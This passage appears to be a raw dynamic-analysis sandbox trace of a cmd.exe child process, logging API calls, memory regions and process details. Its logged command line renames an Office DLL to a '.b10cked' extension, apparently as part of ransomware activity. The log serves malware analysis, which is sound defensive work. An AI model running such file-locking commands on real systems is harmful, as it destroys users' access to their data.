dwFlags=0x3) returned 1 [0172.489] FindClose (in: hFindFile=0x342130 | out: hFindFile=0x342130) returned 1 [0172.489] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20edf0 | out: _Buffer=" 1") returned 9 [0172.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.489] GetFileType (hFile=0x7) returned 0x2 [0172.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ed7c | out: lpMode=0x20ed7c) returned 1 [0172.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20edb0 | out: lpConsoleScreenBufferInfo=0x20edb0) returned 1 [0172.489] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.490] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20edf0 | out: lpBuffer=" 1 
file(s) moved.\r\n") returned 0x1a [0172.490] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20edd4*=0x1a) returned 1 [0172.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.491] SetConsoleInputExeNameW () returned 0x1 [0172.491] GetConsoleOutputCP () returned 0x1b5 [0172.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.491] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.491] exit (_Code=0) Process: id = "293" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0x4b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22952 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22953 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22954 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22955 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22956 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22957 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22958 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22959 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22960 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22961 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23501 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23502 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23503 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23504 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 23505 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 23506 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23507 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23508 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23509 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23510 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23511 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23512 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23513 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23514 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23515 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 23516 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23517 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23518 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 23519 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23520 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23521 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23522 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 23523 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" 
filename = "" Region: id = 23524 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 361 os_tid = 0x808 [0172.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f90c | out: lpSystemTimeAsFileTime=0x14f90c*(dwLowDateTime=0x9ca07880, dwHighDateTime=0x1d440a9)) [0172.354] GetCurrentProcessId () returned 0x4b0 [0172.354] GetCurrentThreadId () returned 0x808 [0172.354] GetTickCount () returned 0x323b5 [0172.354] QueryPerformanceCounter (in: lpPerformanceCount=0x14f904 | out: lpPerformanceCount=0x14f904*=22914359197) returned 1 [0172.355] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.355] __set_app_type (_Type=0x1) [0172.355] __p__fmode () returned 0x76b331f4 [0172.355] __p__commode () returned 0x76b331fc [0172.355] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.356] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.356] GetCurrentThreadId () returned 0x808 [0172.356] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x808) returned 0x38 [0172.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.356] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.356] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.356] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.356] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f89c | out: phkResult=0x14f89c*=0x0) returned 0x2 [0172.356] VirtualQuery (in: lpAddress=0x14f8d3, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x14f000, AllocationBase=0x50000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.359] GetConsoleOutputCP () returned 0x1b5 [0172.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.359] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.359] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.360] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.360] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.360] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.360] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.360] GetEnvironmentStringsW () returned 0x270210* [0172.361] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.361] GetEnvironmentStringsW () returned 0x270210* [0172.361] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.361] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e80c | out: phkResult=0x14e80c*=0x40) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0xa0, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x0, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegCloseKey (hKey=0x40) returned 0x0 [0172.361] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e80c | out: phkResult=0x14e80c*=0x40) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x0, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, 
lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegCloseKey (hKey=0x40) returned 0x0 [0172.362] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.362] srand (_Seed=0x5b886388) [0172.362] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0172.362] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0172.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.362] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x271970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.363] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.363] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.363] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.363] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.363] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.363] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.363] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.363] GetEnvironmentStringsW () returned 0x272360* [0172.363] FreeEnvironmentStringsW (penv=0x272360) returned 1 [0172.363] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.363] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.363] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.363] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.363] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.363] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.364] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.364] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.364] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.364] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.364] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f5d8, lpFilePart=0x14f5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f5d4*="Desktop") returned 0x18 [0172.364] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.364] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.364] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.364] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.364] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.365] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.365] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.365] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.365] GetEnvironmentStringsW () returned 0x270210* [0172.365] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.366] GetConsoleOutputCP () returned 0x1b5 [0172.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.366] GetUserDefaultLCID () returned 0x409 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f718, cchData=128 | out: lpLCData="0") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f718, cchData=128 | out: lpLCData="0") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f718, cchData=128 | out: lpLCData="1") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.366] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.367] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.368] GetConsoleTitleW (in: lpConsoleTitle=0x260930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.369] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.369] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.369] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.369] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.369] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.369] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.369] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.373] GetConsoleTitleW (in: lpConsoleTitle=0x14f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.530] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.530] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.530] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.530] _wcsicmp (_String1="move", 